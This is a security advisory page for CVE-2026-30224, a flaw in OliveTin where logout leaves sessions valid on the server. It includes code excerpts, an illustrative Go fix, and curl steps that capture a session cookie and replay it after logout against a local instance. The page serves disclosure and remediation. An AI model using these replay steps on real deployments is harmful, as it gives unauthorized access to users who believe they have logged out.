CVE-2026-30224

CVE-2026-30224 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260304233115-d6a0abc3755d15. It is fixed in 0.0.0-20260304233115-d6a0abc3755d15.

Summary

OliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year).

An attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.

This is a session management flaw that violates expected logout semantics.

Details

During logout:

// Logout only clears browser cookie
response.Header().Set("Set-Cookie", localCookie.String())

However, the server still accepts the session:

session := sessionStorage.Providers[provider].Sessions[sid]
...
return session

The SID is not deleted from sessionStorage.

Why vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).

File: api.go, sessions.go, local.go
Lines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47
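
The logout flaw reduced to a self-contained Go example (added here; this is not OliveTin's own code): `LogoutCookieOnly` does what the advisory describes, expiring the browser cookie while the SID stays in the store, and `Logout` shows the fix of deleting the server-side entry before clearing the cookie. `Session`, `Store` and the function names are assumptions for illustration; only the cookie name comes from the PoC above.

```go
package main
import (
	"crypto/rand"
	"encoding/hex"
	"net/http"
	"time"
)

// Session is the server-side record keyed by SID (assumed shape, not OliveTin's own type).
type Session struct {
	Username string
	Expires  time.Time
}

// Store is a minimal in-memory stand-in for sessionStorage (single-goroutine demo, no locking).
type Store struct{ sessions map[string]*Session }

func NewStore() *Store { return &Store{sessions: map[string]*Session{}} }

// Login creates a session with the given lifetime and returns its SID.
func (s *Store) Login(user string, ttl time.Duration) string {
	b := make([]byte, 16)
	rand.Read(b) // crypto/rand; does not fail on supported platforms
	sid := hex.EncodeToString(b)
	s.sessions[sid] = &Session{Username: user, Expires: time.Now().Add(ttl)}
	return sid
}

// Lookup is what an endpoint like WhoAmI relies on: the session for a SID, or nil if unknown or expired.
func (s *Store) Lookup(sid string) *Session {
	if sess, ok := s.sessions[sid]; ok && time.Now().Before(sess.Expires) {
		return sess
	}
	return nil
}

// clearedCookie is the Set-Cookie the browser receives on logout: empty and already expired.
func clearedCookie() *http.Cookie {
	return &http.Cookie{Name: "olivetin-sid-local", Value: "", MaxAge: -1, Path: "/", HttpOnly: true}
}

// LogoutCookieOnly reproduces the flaw: the cookie is expired client-side, but the SID is never removed.
func (s *Store) LogoutCookieOnly(sid string) *http.Cookie { return clearedCookie() }

// Logout is the corrected behaviour: revoke the server-side session first, then expire the cookie.
func (s *Store) Logout(sid string) *http.Cookie {
	delete(s.sessions, sid)
	return clearedCookie()
}
```

A replayed SID succeeds against `LogoutCookieOnly` and fails against `Logout`, which is exactly the difference the reproduction steps below observe.
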

Behavior

  • Login → receive SID cookie
  • Logout → cookie cleared client-side
  • Replay old SID manually → still authenticated

Expected:

  • Logout invalidates session immediately

Actual:

  • Old SID remains usable until expiry

PoC

Minimal config

listenAddressSingleHTTPFrontend: 0.0.0.0:16642
authRequireGuestsToLogin: true

authLocalUsers:
  enabled: true
  users:
    - username: low
      usergroup: users
      password: "$argon2id$..."

actions:
  - title: Dummy
    id: dummy
    shell: "echo dummy"

Reproduction

Login and capture SID:

LOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')

SID=$(printf '%s\n' "$LOGIN" | awk -F'[=;]' '/olivetin-sid-local/{print $2}')

Works before logout:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Logout:

curl -X POST http://localhost:16642/api/Logout \
  -H "Cookie: olivetin-sid-local=$SID"

Replay old cookie:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Result

User is still authenticated after logout.

Session Management Flaw

  • Logout Bypass
  • Session Replay

Risk:

  • Stolen cookies remain valid
  • Persistent unauthorized access
  • Users falsely believe logout ended the session

Attack scenarios:

  • Shared computers
  • XSS/session theft
  • Proxy logs
  • Malware/browser compromise

Impact

CVE-2026-30224 has a CVSS score of 5.4 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260304233115-d6a0abc3755d15); upgrading removes the vulnerable code path.

Affected versions

github.com/OliveTin/OliveTin (< 0.0.0-20260304233115-d6a0abc3755d15)

Security releases

github.com/OliveTin/OliveTin → 0.0.0-20260304233115-d6a0abc3755d15 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Remediation advice

Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260304233115-d6a0abc3755d15 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30224? CVE-2026-30224 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260304233115-d6a0abc3755d15. It is fixed in 0.0.0-20260304233115-d6a0abc3755d15.
  2. How severe is CVE-2026-30224? CVE-2026-30224 has a CVSS score of 5.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-30224? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260304233115-d6a0abc3755d15 are affected.
  4. Is there a fix for CVE-2026-30224? Yes. CVE-2026-30224 is fixed in 0.0.0-20260304233115-d6a0abc3755d15. Upgrade to this version or later.
  5. Is CVE-2026-30224 exploitable, and should I be worried? Whether CVE-2026-30224 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-30224 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-30224? Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260304233115-d6a0abc3755d15 or later.

Other vulnerabilities in github.com/OliveTin/OliveTin

  • CVE-2026-53541
  • CVE-2026-48709
  • CVE-2026-48708
  • CVE-2026-32102
  • CVE-2026-31817